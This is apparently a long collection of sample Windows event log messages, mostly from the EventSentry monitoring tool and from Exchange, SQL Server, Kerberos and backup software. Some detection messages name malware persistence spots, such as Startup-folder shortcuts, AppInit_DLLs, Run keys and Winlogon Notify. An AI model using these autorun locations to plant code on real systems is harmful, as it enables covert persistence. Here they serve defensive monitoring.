Message:
Unable to initialize the Microsoft Exchange Information Store service. - Error 0x80004005.
Message:
Congratulations! You have just installed and setup up EventSentry (on host TEST3-W2K), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.
Message:
Error 0x80004005 connecting to the Microsoft Active Directory
Message:
Successful Logon:
User Name: <user name>
Domain: <domain name>
Logon ID: <logon identifier>
Logon Type: <logon type>
Logon Process: <logon process>
Authentication Package: <package name>
Workstation Name: <computer name>
Message:
Connection to the Microsoft Exchange Server has been restored
Source:
Application Error
Message:
Faulting application test.exe, version 1.00.0.400, faulting module test.exe, version 1.00.0.400, fault address 0x00031112.
Message:
A new process has been created:
New Process ID: 860
Image File Name: calc.exe
Creator Process ID: 3492
User Name: MyUser
Domain: NETIKUS
Logon ID: (0x0,0x87F44D2)
Message:
Failed extract of third-party root list from auto update cab at: <http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab> with error: A required certificate is not within its validity period when verifying against the current system clock or the timestamp in the signed file.
Message:
TCP/IP has reached the security limit imposed on the number of concurrent TCP connect attempts.
Message:
Failed to connect to server
Message:
The 'ESE API' returned 'Unable to perform the operation. Either you can not connect to the specified server
or the service you are trying to connect to is not running.
' from a call to 'HrESEBackupRestoreNodes()' additional data ''
Message:
The session setup from the computer ComputerName failed to authenticate. The name of the account referenced in the security database is AccountName$.
The following error occurred:
Access is denied.
Message:
3041 :
BACKUP failed to complete the command BACKUP LOG [DATABASE] TO DISK = N'E:\Microsoft SQL Server\MSSQL\BACKUP\DatabaseLog.backup' WITH INIT , NOUNLOAD , NAME = N'Database Transaction Log Backup', NOSKIP , STATS = 10, NOFORMAT
Message:
Microsoft (R) Windows (R) 5.02. 3790 Multiprocessor Free.
Message:
The system uptime is 10045 seconds.
Message:
The device, \Device\ScsiPort0, did not respond within the timeout period.
Message:
The driver detected a controller error on Device\ScsiPort0.
Message:
A parity error was detected on [device name].
Message:
The firmware update, Version 4.09 P29-09/15/2004, contains critical bug fixes and is the minimum version required. Please perform the update at your earliest convenience. Click on the underlined Version to view more details on the fixes.
Fixes
ProLiant DL380 G3 ROM P29 (09/15/2004)
Updated to integrate the latest Intel processor support code into the System ROM. This works around an issue with the Intel Xeon processor that could cause unexpected behavior or system hang.
Source:
Internet Explorer
Message:
The '..' characters are not allowed in the Path parameter for the MapPath method
Message:
The event description will show any message received through the syslog protocol
Message:
Adapter Intel(R) PRO/100 VE Network Connection: Did not receive auto-negotiation advertisement from link partner. A full duplex connection may be available.
Message:
The user xxx\xxx failed an authentication attempt due to the following reason: The user could not be authenticated using Challenge Handshake Authentication Protocol (CHAP). A reversibly encrypted password does not exist for this user account. To ensure that reversibly encrypted passwords are enabled, check either the domain password policy or the password settings on the user account.
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
The kerberos subsystem encountered a PAC verification failure. This indicates that the PAC from the client computername$ in realm DOMAIN.LOCAL had a PAC which failed to verify or was modified. Contact your system administrator.
Message:
The kerberos subsystem is having problems fetching tickets from your domain controller using the UDP network protocol. This is typically due to network problems. Please contact your system administrator.
Source:
Internet Explorer
Message:
/projectserver/Library/pjquery.asp, line 658
Source:
Application Management
Message:
MSI Error - 2755 -
Failed to apply changes to software installation settings. Software changes could not be applied. A previous log entry with details should exist. The error was : The Temp folder is on a drive that is full or is inaccessible. Free up space on the drive or verify that you have write permission on the Temp folder.
Message:
The RDP protocol component "DATA ENCRYPTION" detected an error in the protocol stream and has disconnected the client.
Message:
An unknown error occurred while processing the current request: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.
Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
Inner Error: Exception has been thrown by the target of an invocation.
Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
Inner Error: The remote server returned an error: (403) Forbidden.
Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)
For more information, see Help and Support Center at http://go.microsoft.com/fwlink/events.asp.
Message:
18272 :
I/O error on backup or restore restart-checkpoint file 'C:\Program Files\Microsoft SQL Server\MSSQL$BKUPEXEC\backup\model4IDR.ckp'. Operating system error 3(error not found). The statement is proceeding but is non-restartable.
Message:
Referral Interface cannot contact any Global Catalog that supports the NSPI Service. Clients making RFR requests will fail to connect until a Global Catalog becomes available again. After a Domain Controller is promoted to a Global Catalog, it must be rebooted to support MAPI Clients.
Message:
When performing a RSOP to a remote computer you get: You do not have permission to perform this operation. Access is denied.
Source:
Microsoft Operations Manager
Message:
The MOM Server failed to install agent on remote computer xxxx-cb00.xxxx.local.
Error Code: -2147024891
Error Description: Access is denied.
Microsoft Installer Error Description: No Description Available
Source:
MOM Operator Console
Message:
The response processor failed to execute a response. The response returned the error message: The remote procedure call failed.
Response Details:
Rule ID: {xxx-xxx-xx-x-x-x-x-x}
Response description: script: bla
Time of Last Event: 1/14/2005 8:32:42 AM
Time Raised: 1/14/2005 8:32:33 AM
Rule Name: The rule response failed to execute
Modified By: NT AUTHORITY\NETWORK SERVICE
Message:
Windows cannot access the file gpt.ini for GPO CN=31B2F340-016D-11D2-945F-00C04FB984F9,CN=Policies,CN=System,DC=xxxx,DC=local. The file must be present at the location <\\xxxx.local\sysvol\xxxx.local\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\gpt.ini>. (Configuration information could not be read from the domain controller, either because the machine is unavailable, or access has been denied. ). Group Policy processing aborted.
Message:
An unknown error occurred while processing the current request:
Message: The remote server returned an error: (403) Forbidden.
Source: Microsoft.Exchange.OMA.ExchangeDataProvider
Stack trace:
at Microsoft.Exchange.OMA.ExchangeDataProvider.OmaWebRequest.GetRequestStream()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices.GetSpecialFolders()
at Microsoft.Exchange.OMA.ExchangeDataProvider.ExchangeServices..ctor(UserInfo user)
Message: Exception has been thrown by the target of an invocation.
Source: mscorlib
Stack trace:
at System.Reflection.RuntimeConstructorInfo.InternalInvoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture, Boolean isBinderDefault)
at System.Reflection.RuntimeConstructorInfo.Invoke(BindingFlags invokeAttr, Binder binder, Object[] parameters, CultureInfo culture)
at System.RuntimeType.CreateInstanceImpl(BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at System.Activator.CreateInstance(Type type, BindingFlags bindingAttr, Binder binder, Object[] args, CultureInfo culture, Object[] activationAttributes)
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
Message: Exception of type Microsoft.Exchange.OMA.DataProviderInterface.ProviderException was thrown.
EventMessage:
UserMessage: A System error has occurred while processing your request. Please try again. If the problem persists, contact your administrator.
Source: Microsoft.Exchange.OMA.UserInterface
Stack trace:
at Microsoft.Exchange.OMA.UserInterface.Global.Session_Start(Object sender, EventArgs e)
at System.Web.SessionState.SessionStateModule.RaiseOnStart(EventArgs e)
at System.Web.SessionState.SessionStateModule.CompleteAcquireState()
at System.Web.SessionState.SessionStateModule.BeginAcquireState(Object source, EventArgs e, AsyncCallback cb, Object extraData)
at System.Web.AsyncEventExecutionStep.System.Web.HttpApplication+IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
Message:
The 'Active Directory' returned 'A disk I/O error occurred.
' from a call to 'BackupTruncateLogs()' additional data '-'.
Message:
The data portion of event 19002 from MSSQLSERVER is invalid.
Message:
Spam rules update error (CopyFile, dwError = 32) (Error code 0x80041F04) occurred.
Message:
Event Type: Warning
Event Source: NtFrs
Event Category: None
Event ID: 13565
Date: 10.03.2005
Time: 18:09:24
User: N/A
Computer: xxxx
Description:
File Replication Service is initializing the system volume with data from another domain controller. Computer XXXX-CB01 cannot become a domain controller until this process is complete. The system volume will then be shared as SYSVOL.
To check for the SYSVOL share, at the command prompt, type:
net share
When File Replication Service completes the initialization process, the SYSVOL share will appear.
The initialization of the system volume can take some time. The time is dependent on the amount of data in the system volume, the availability of other domain controllers, and the replication interval between domain controllers.
Message:
The data buffer created for the "MSExchangeIS" service in the "C:\Program Files\Exchsrvr\bin\mdbperf.dll" library is not aligned on an 8-byte boundary. This may cause problems for applications that are trying to read the performance data buffer. Contact the manufacturer of this library or service to have this problem corrected or to get a newer version of this library.
Source:
Service Control Manager
Message:
The Microsoft Exchange Routing Engine service failed to start due to the following error:
The executable program that this service is configured to run in does not implement the service.
Message:
The application-specific permission settings do not grant Local Activation permission for the COM Server application with CLSID
0C0A3666-30C9-11D0-8F20-00805F2CD064
to the user BULL\IWAM_BULL SID (BULL\IWAM_BULL). This security permission can be modified using the Component Services administrative tool.
Source:
Service Control Manager
Message:
The Microsoft Exchange Information Store service terminated with service-specific error 0 (0x0).
Message:
The Security System could not establish a secured connection with the server DNS/lyra.u.arizona.edu. No authentication protocol was available
Message:
WLBS : host 1 does not have the same number or type of port rules as this host. Please check WLBS Setup dialog on all machines that belong to the cluster and make sure that they all contain the same number and the same type of port rules.
Message:
The status for service HTTPFilter (HTTP SSL) changed from Stopped to Running.
Message:
Automatic certificate enrollment for local system failed to enroll for one Enrollment Agent (Computer) certificate (0x80094012). The permissions on the certificate template do not allow the current user to enroll for this type of certificate.
Source:
MSExchangeTransport
Source:
MSExchangeTransport
Message:
The categorizer is unable to categorize messages due to a retryable error.
Message:
Logon Failure:
Reason: The user has not been granted the requested
logon type at this machine
User Name: %1
Domain: %2
Logon Type: %3
Logon Process: %4
Authentication Package: %5
Workstation Name: %6
Message:
The IP address lease %1 for the Network Card with network address %2 has been denied by the DHCP server %3 (The DHCP Server sent a DHCPNACK message).
Message:
The shell stopped unexpectedly and %1 was restarted.
Source:
Service Control Manager
Message:
The PfModNT service failed to start due to the following error:
The system cannot find the file specified.
Message:
Printer Canon Bubble-Jet BJC-85 (from RACOON) is pending deletion.
Message:
EventSentry was unable to query the local audit policy settings. A call to open the LSA policy failed with error Access is denied.. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
The Windows Firewall has detected an application listening for incoming traffic.
Name: -
Path: C:\WINDOWS\system32\svchost.exe
Process identifier: 1160
User account: SYSTEM
User domain: NT AUTHORITY
Service: Yes
RPC server: No
IP version: IPv4
IP protocol: UDP
Port number: 68
Allowed: No
User notified: No
Message:
{Delayed Write Failed} Windows was unable to save all the data for the file \Device\LanmanRedirector. The data has been lost. This error may be caused by a failure of your computer hardware or network connection. Please try to save this file elsewhere.
Message:
The "\\SERVER\SophosSBE\" library update task has failed. INDEX 0x8000ffff
Update failed. Parent could not be accessed. Check the parent address/path and access settings. INDEX 0x8000ffff
Could not read the EM Library database. MCID 0x80040403
Could not open requested resource "/update/index/00000000.db". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Failed to make a connection. VFS 0x80040407
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Could not open requested resource "/update/index/db.inf". VFS 0x80040403
A connection attempt failed because the connected party did not properly respond after a period of time, or established connection failed because connected host has failed to respond.
Source:
Service Control Manager
Message:
The ServiceABC service terminated unexpectedly. It has done this 3 time(s). The following corrective action will be taken in 0 milliseconds: No action.
Message:
The Security Account Manager failed a KDC request in an unexpected way. The error is in the data field. The account name was username@MYDOMAIN.LOCAL and lookup type 0x28.
Message:
An error occurred during a scheduled backup of drive I:\.
Error EA39070A: The internal structure of the PQI file is invalid or unsupported.
Details: 0xEA39070A
Source: Norton Ghost 9.0
Source:
Active Server Pages
Message:
Error: The Template Persistent Cache initialization failed for Application Pool 'DefaultAppPool' because of the following error: Could not create a Disk Cache Sub-directory for the Application Pool. The data may have additional error codes..
Message:
An infected file has been found.
Message:
Begin Backup of SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal
Message:
End Backup of 'SERVER\Microsoft Information Store\First Storage Group' Verify: Off Mode: Append Type: Normal
Message:
Unable to connect to SMTP host email.company.com due to error 'Unable to establish TCP connection (10065). If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Message:
The process notification (target) "My Process" successfully executed the process "c:\batch\backup.cmd".
Message:
The process notification (target) "MyProcess" was unable to execute the process "c:\batch\mybatchfile.cmd" due to error 5.
Message:
User DOMAIN\User has successfully connected to host REMOTE from host LOCAL with the EventSentry management application.
Message:
When monitoring the Application event log, the EventSentry agent missed events between number 980 to 984. EventSentry will attempt to read those events at a later time to make sure that all events from the Application log are being processed.
Message:
The EventSentry agent has successfully adjusted the permissions of the configuration registry key HKLM\Software\netikus.net\EventSentry. 3 ACE entries (one of the following: Users, Power Users, Everyone) were removed to increase security.
Message:
Time Provider NtpClient: This machine is configured to use the domain hierarchy to determine its time source, but it is the PDC emulator for the domain at the root of the forest, so there is no machine above it in the domain hierarchy to use as a time source. It is recommended that you either configure a reliable time service in the root domain, or manually configure the PDC to synchronize with an external time source. Otherwise, this machine will function as the authoritative time source in the domain hierarchy. If an external time source is not configured or used for this computer, you may choose to disable the NtpClient.
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-............ The data is the error code.
Message:
Replication of license information failed because the License Logging Service on server <Server> could not be contacted.
Message:
No Windows NT or Windows 2000 Domain Controller is available for domain Domain. The following error occurred:
There are currently no logon servers available to service the logon request.
Source:
Active Server Pages
Message:
Error: The Template Persistent Cache initialization failed for Application Pool 'DefaultAppPool' because of the following error: Could not create a Disk Cache Sub-directory for the Application Pool. The data may have additional error codes..
Message:
Unable to read local eventlog (reason: The data area passed to a system call is too small).
Message:
The EventSentry service could not start because of a configuration error. Please make sure that you have at least one filter and target or the syslog daemon configured.
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3.
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.
Message:
Unable to open parallel port LPTx. Please make sure that no application is currently using this printer port, also make sure that no printer is using port LPTx. You might have to restart the service after the resource conflict is solved.
Message:
Unable to start service because no valid license was found.
Message:
The configuration for the agent (service) was successfully re-read from the registry.
Message:
The custom event log MyCustomLog is not configured on this system. You will not be able to monitor this event log on this system. The service (agent) will continue to run without interruption.
Message:
The temporary file %1 has been found but no filter referencing this target (%2) is configured for a summary notification. The file has been deleted.
Message:
The following service was added: UtilMan (Utility Manager). Current service state is Stopped, service is using binary file C:\WINNT\System32\UtilMan.exe.
Message:
Replication of license information failed because the License Logging Service on server <PDC servername> could not be contacted.
Message:
The following x service(s) are configured to AUTOSTART but are currently not running:
Cdaudio
Changer
CD-Burning Filter Driver
lbrtfdc
mrtRate
PCIDump
Sfloppy
Security Center
Message:
Product: J2SE Runtime Environment 5.0 Update 4 -- Installation failed.
Message:
Automatic certificate enrollment for local system failed to contact the active directory (0x8007054b). The specified domain either does not exist or could not be contacted.
Enrollment will not be performed.
Source:
MSExchangeIS Public Store
Message:
user@domain.com failed an operation on folder /O=ORG/OU=FIRST ADMINISTRATIVE GROUP/CN=RECIPIENTS/CN=OAB VERSION 3AD24215E446FED006D7E903A387A01BE4002721 on database "First Storage Group\Public Folder Store (SERVER)" because the user did not have the following access rights:
'Delete' 'Read Property' 'Write Property' 'Create Message' 'View Item' 'Create Subfolder' 'Write Security Descriptor' 'Write Owner' 'Read Security Descriptor' 'Contact'
The entry ID of the folder is in the data section of this event.
Message:
DS lookup for user [USERNAME], connecting from 10.10.10.1, failed with error 0x80040920.
Message:
Authentication attempt from 10.10.10.1 to [USERNAME] has failed with error 0x52e.
Message:
Error reading log event record. Handle specified is %d. Return code from ReadEventLog is 122.
Message:
Backup Exec Alert: Job Failed(Server:
Message:
Application UserFaultCheck (%systemroot%\system32\dumprep 0 -u) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will no longer be run when a user logs into the system.
Message:
Object Open: Object Server: SC Manager Object Type: SERVICE OBJECT Object Name: RemoteAccess New Handle ID: - Operation ID: {0,840128961} Process ID: 416 Primary User Name: CLMTS001$ Primary Domain: ATSC Primary Logon ID: (0x0,0x3E7) Client User Name: e010421 Client Domain: ATSC Client Logon ID: (0x0,0x32125658) Accesses Query status of service Privileges -
Message:
Failed to connect to server. Error: 0x800401F0
Message:
The system failed to flush data to the transaction log. Corruption may occur.
Message:
Failed to setup initiator portal. Error status is given in the dump data.
Message:
wuaueng.dll (620) SUS20ClientDataStore: A request to write to the file
Message:
Adapter 1: Battery Voltage LOW.
Source:
Application Management
Message:
The assignment of application Command AntiVirus for Windows Enterprise from policy Command AV failed. The error was: The group policy framework should call the extension in the synchronous foreground policy refresh.
Source:
Application Management
Message:
The install of application "application name" from policy "policy name" failed. The error was : The installation source for this product is not available. Verify that the source exists and that you can access it.
Message:
Unexpected error 0x8004010f occurred in
Message:
Active Directory attempted to perform a remote procedure call (RPC) to the following server. The call timed out and was cancelled.
Server:
6d0f4d18-521c-4429-8d8e-06faf22b4f57._msdcs.ds.han.xx
Call Timeout (Mins):
5
Thread ID:
fcc
Additional Data
Internal ID:
5001047
Message:
Unable to read the disk performance information from the system. Disk performance counters must be enabled for at least one physical disk or logical volume in order for these counters to appear. Disk performance counters can be enabled by using the Hardware Device Manager property pages. Status code returned is data DWORD 0.
Message:
Backup Exec Alert: Tape Alert Warning
(Server: "FILE") (Job: "Company - Differential Slot 6") Warning - Library security has been compromised.
Robotic Library for Device: DELL 3
Message:
Backup of data protection master key.
Key Identifier: ab7287ab-974d-4dc7-aaaa-91e0bc96642e
Recovery Server:
Recovery Key ID:
Failure Reason: 0x3A
Message:
Object Open: Object Server: Security Object Type: File Object Name: \Device\NetbiosSmb Handle ID: - Operation ID: {0,1502291133} Process ID: 1144 Image File Name: C:\WINDOWS\system32\svchost.exe Primary User Name: LOCAL SERVICE Primary Domain: NT AUTHORITY Primary Logon ID: (0x0,0x3E5) Client User Name: - Client Domain: - Client Logon ID: - Accesses: SYNCHRONIZE ReadData (or ListDirectory) WriteData (or AddFile) Privileges: - Restricted Sid Count: 0 Access Mask: 0x100003
Message:
The status for service WmiApSrv (WMI Performance Adapter) changed from Running to Stopped.
Message:
Kan het registerbestand niet verwijderen. Als u een zwervend profiel hebt, worden uw instellingen niet gerepliceerd. Neem contact op met de systeembeheerder.
Details: Toegang geweigerd. , buildnummer ((2195)).
Message:
Time Stamp 12/31/05 18:59:05 Event Number 908 Severity Error Host CX300_SPB Storage Array APM00050506804 SPB Device SP B Description Fault - Cache Disabling
Message:
The service mouhid (Mouse HID Driver) is now being monitored. Current service status is Running.
Message:
The following service was added: APC UPS Service (APC UPS Service). Current service state is Running, service is using binary file C:\Program Files\APC\APC PowerChute Personal Edition\mainserv.exe.
Message:
The following service was removed: APC UPS Service (APC UPS Service). Last service state was Running.
Message:
The service Abiosdsk (Abiosdsk) will not be monitored anymore. Last service status was Stopped.
Message:
"c:\batch\db_upd.cmd" was run for 381 seconds with the result shown below. Return Code was 0.
Downloading file ...
Dropping existing tables ...
Decompressing download file ...
Importing SQL data ...
Done.
Message:
The process "c:\batch\update.cmd" could not be created due to the following error:
The system cannot find the path specified.
Message:
The process superdel.exe exceeded the maximum allowed time interval of 15 minute(s). EventSentry was unable to terminate the process due to the following error: Acess Denied.
Message:
The process C:\temp\vnc-4_1_1-x86_win32.exe exceeded the maximum allowed time interval of 1 minute(s). The process was terminated. Please increase the timeout interval for this process in the management application (System Health -> Application Scheduler).
Message:
The Application event log was successfully cleared.
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\Windows\evilvirus.exe) registered itself in the directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.
Message:
The Application event log was successfully backed up to file C:\EVENTLOG BACKUP\APPLICATION_ 2005_08_18.EVT.
Message:
The Security event log was successfully cleared and backed up to file V:\CENTRAL EVENT LOG BACKUP\WHALE_SECURITY_08022006_1400.EVT.
Message:
The Security event log could not be cleared due to the following error: Access is Denied.
Message:
The Application event log could not be backed up to file C:\BACKUP\ESLOG\BULL_09022006.EVT due to the following error:
Cannot create a file when that file already exists.
Message:
The System event log could not be cleared and backed up due to the following error: Access is Denied.
Message:
Full event logs cannot be detected on this machine, this feature is not supported on this platform (only Windows 2000 or higher).
Message:
The process explorer.exe (PID 828) seems to be leaking "Working Set" memory. If you keep seeing this message in the event log then it is recommended that you monitor the memory consumption of this process closely with performance monitor if you have not already done so.
The process is currently using 5738496 bytes of "Working Set" memory, system memory load is 87%.
If you are certain that this process is not leaking memory then you can exclude this process from being monitored or change the monitoring parameters (contact support@netikus.net for more information) in the registry. If this process is leaking memory then contact the manufacturer of the application for support.
Message:
The process eventsentry_gui.exe is not active.
Message:
Free disk space for drive V:\ is below the configured limit of 4 percent. 3.31 percent of disk space (985 Mb) are currently available on drive V:\.
Message:
Free disk space for drive C:\ is below the configured limit of 500 Mb. 152 Mb of disk space are currently available on drive C:\.
Message:
Application NTToolkit was installed.
Additional Information:
Publisher: NETIKUS.NET ltd
Installation Directory: C:\Program Files\NTToolkit
Version: 1.91
Message:
Application NToolkit (NTToolkit) was uninstalled.
Message:
Application QuickTime Task ("C:\Program Files (x86)\QuickTime\qttask.exe" -atboottime) registered itself in the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will be automatically run when a user logs into the system.
Message:
The registry value AppInit_DLLs in key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows changed from "" to "wbsys.dll". All files specified in this value will be automatically run when a user logs into the system.
Message:
Application UserFaultCheck (%systemroot%\system32\dumprep 0 -u) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run and will no longer be run when a user logs into the system.
Message:
The application eraseallfiles.exe registered itself in the directory c:\Documents and Settings\All Users\Start Menu\Programs\Startup and will be automatically run when a user logs into the system.
Message:
The shortcut PerformanceEnhancer.lnk (using file C:\windows\evilvirus.exe) was removed from directory C:\Documents and Settings\All Users\Start Menu\Programs\Startup and will no longer run when a user logs into the system.
Message:
Application YourPersonalAdware.exe was added to the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will be automatically run when the system boots.
Message:
Application YourPersonalAdware.exe was removed from the registry key HKLM\SOFTWARE\Policies\Microsoft\Windows\System\Scripts\Startup and will no longer be run the system boots.
Message:
The application >26923b43-4d38-484f-9b9e-de460746276c registered file %systemroot%\system32\shmgrate.exe OCInstallUserConfigIE in registry key SOFTWARE\Microsoft\Active Setup\Installed Components and might be automatically run when a user logs into the system. Please see the help file (search for ACTIVE SETUP) for more information.
Message:
There were password errors using the Credential Manager. To remedy, launch the Stored User Names and Passwords control panel applet, and reenter the password for the credential DOMAIN\myadmin.
Message:
Application >60B49E34-C7CC-11D0-8953-00A0C90347FF (using file ) was removed from the registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components and will no longer be run when a user logs into the system.
Message:
There was an error (999) monitoring registry key HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components. Please restart the EventSentry agent or notify NETIKUS.NET support if this problem persists. Autorun monitoring will NOT continue.
Message:
VMware process did not start properly.
Message:
The explorer extension DLL SecretMalwareDLL (using file ieatfiles.dll) was removed from the registry key HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify and will no longer be loaded into explorer.exe.
Category:
Performance Monitoring
Message:
The performance counter "Memory\Available MBytes" fell below the threshold of 10, the current average is 9.
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") fell below the threshold of %3, the current average is %4.
Category:
Performance Monitoring
Message:
The performance counter "%1" equals the threshold of %2.
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\Thread Count" (instance "myapp") equals the threshold of 20.
Category:
Performance Monitoring
Message:
The performance counter "%1" exceeded the threshold of %2, the current average is %3.
Category:
Performance Monitoring
Message:
The performance counter %1 (instance %2) exceeded the threshold of %3, the current average is %4.
Message:
The group alert "Performance Warning" was triggered because all performance counters of this group reported an alert the last time they were checked. Please see below for a list of all performance counters and the data last reported:
Low Memory: 120 (17 seconds ago)
High Paging Activity: 250 (0 seconds ago)
Category:
Performance Monitoring
Message:
One or more required function entry points could not be found in the dynamic link library PDH.DLL. Please make sure that the latest version of PDH.DLL is installed on this machine, for example you may copy the DLL from another machine running a later Operating System. Performance monitoring cannot continue.
Category:
Performance Monitoring
Message:
The performance counter %1 is back above the threshold of %2, the current average is %3.
Category:
Performance Monitoring
Message:
The performance counter "%1" (instance "%2") is back above the threshold of %3, the current average is %4.
Category:
Performance Monitoring
Message:
The performance counter "%1" is back below the threshold of %2, the current average is %3.
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "mysqld-nt") is back below the threshold of 50, the current average is 48.
Category:
Performance Monitoring
Message:
The performance counter "Process(*)\% Processor Time" (instance "SWEEPSRV.SYS") which previously exceeded the configured threshold, is not available anymore and will not be monitored.
Message:
Congratulations! You have just installed and setup up EventSentry (on host BLACKMAMBA), which we believe to be the most efficient and economic event log and system monitoring application on the market.
Please visit http://www.eventsentry.com or http://www.netikus.net/ for more information on EventSentry.
Thank you for using EventSentry.
Message:
Unable to connect to SMTP host %1 due to error "%2". If you are running McAfee Anti-Virus then make sure that outgoing SMTP traffic is not blocked from this machine (e.g. "Access Protection") and that no firewall is blocking traffic between this host and the mail server.
Message:
Error during SMTP communication with SMTP host %1. After sending "%2" the following error occurred: %3
Message:
Unable to connect to SMTP host %1 due to error %2. Will try backup smtp host %3 now.
Message:
The process notification (target) %1 successfully executed the process "%2".
Message:
The process notification (target) Laser Printer was unable to execute the process ""cscript.exe" c:\temp\dosprint\eventprint.vbs "Security" "Audit Success" "Security" "Detailed Tracking" 592 "NETIKUSNET\sang.kim" "BULL" "2/22/2006 1:03:33 PM" " " due to error 2.
Message:
EventSentry was unable to connect to the ODBC target "Test ODBC" due to error "OdbcExpandError: [28000] [Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'eventsentry_svc'. (18456)". EventSentry will queue events and continue to attempt the delivery of events.
Message:
The following error occurred while trying to read the "%1" event log: "%2". In most cases the only way to resolve this problem is to save (if possible) and clear the %1 event log. EventSentry will not be able to monitor the %1 event log until this problem is resolved.
Message:
Unable to start service because the End User License Agreement was not accepted
Message:
The session setup from the computer WLBS1 failed to authenticate. The name(s) of the account(s) referenced in the security database is WLBS1$. The following error occurred:
Access is denied.
Message:
The EventSentry agent has successfully changed the buffer size from %1 bytes to %2 bytes after the Operating System returned the following error: "The data area passed to a system call is too small".
Message:
The state of service %1 was Stopped, requested state is Running. EventSentry successfully changed the service status to Running.
Message:
The state of service Spooler is Stopped, requested state is Running. EventSentry was not able to change the service status due to the following error: An instance of the service is already running.
Message:
The process calc.exe is active.
Message:
Trend analysis has determined unusual high disk usage on drive %1. The average recorded trend on drive %1 was %2 kb, the current trend was %3 kb, an increase of %4%%.
If this trend change is expected (for example, caused by a daily backup routine) then you will see this message two more times before the pattern is recognized. With the recorded trend, disk space will be exhausted in %5 days, with the current trend in %6 days.
Message:
Event log filter Test exceeded the configured threshold (3 entries / 300 second(s)). 3 events (out of a total of 8) were dropped by this filter. You can review the dropped events in the event log (if the size of the event log is big enough).
Message:
Event log filter Test has reached the configured threshold (3 entries / 60 second(s)).
Message:
Event log filter Test has reached the configured threshold (3 entries / 300 second(s)). Events matching this filter will now be processed.
Message:
Event log filter Threshold has reached or exceeded the configured threshold (1 entries / 60 second(s)). 5 events were processed during the interval.
Message:
No event matching filter Backup OK has occurred in the event log in the configured time period. According to the schedule, at least one event matching filter Backup OK should have been logged during the last 420 minutes.
Message:
The browser was unable to retrieve a list of servers from the browser master \\DC1-W2K3 on the network \Device\NetBT_Tcpip_631A8496-9308-4979-9849-02D1CAB6CF0A. The data is the error code.
Message:
EventSentry was unable to query the local audit policy settings. A call to query the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
EventSentry has determined that the currently active Audit Policy does not audit "Process Tracking" and EventSentry is NOT configured to activate "Process Tracking". You will either need to activate Process tracking manually by launching "Start -> Programs -> Administrative Tools -> Local Security Settings -> Local Policies -> Audit Policy -> Audit %3 = Audit Success", activate %2 tracking in Active Directory or configure EventSentry to activate "Process Tracking" for you.
Message:
EventSentry determined that "Process Tracking" is currently not enabled and was unable to activate it. A call to change the current audit policy failed with error %1. Please see the EventSentry documentation for troubleshooting advice on this problem.
Message:
The RDP protocol component X.224 detected an error in the protocol stream and has disconnected the client.
Message:
